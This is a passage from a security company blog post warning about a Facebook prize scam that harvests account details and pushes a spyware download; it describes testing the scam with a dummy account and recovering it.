    Still no prizes so far. If you click on the big shiny button on that page, you get this:

    And if you do download that, you get a consolation prize of…spyware. And you just paid for it with your account details. Shortly afterwards, Facebook got back to us about some suspicious access activity in our dummy account:


    No, that’s not where we are. Clicking the ‘I don’t recognize’ button led to a new password creation page, which we could use to recover the dummy account.

    OK, so this scam is still not terribly new or original. We blogged about a roughly similar scam running around Twitter in August of last year.

    Fortunately, the malicious links directing users to these sites are now inactive, and most of the related sites seem to be down. Our product also detects and removes the downloaded spyware.

    Still, stay alert and stay safe.

    - Post by Shantini

    On 22/02/11 At 03:00 AM

    Posted in F-Secure, Facebook
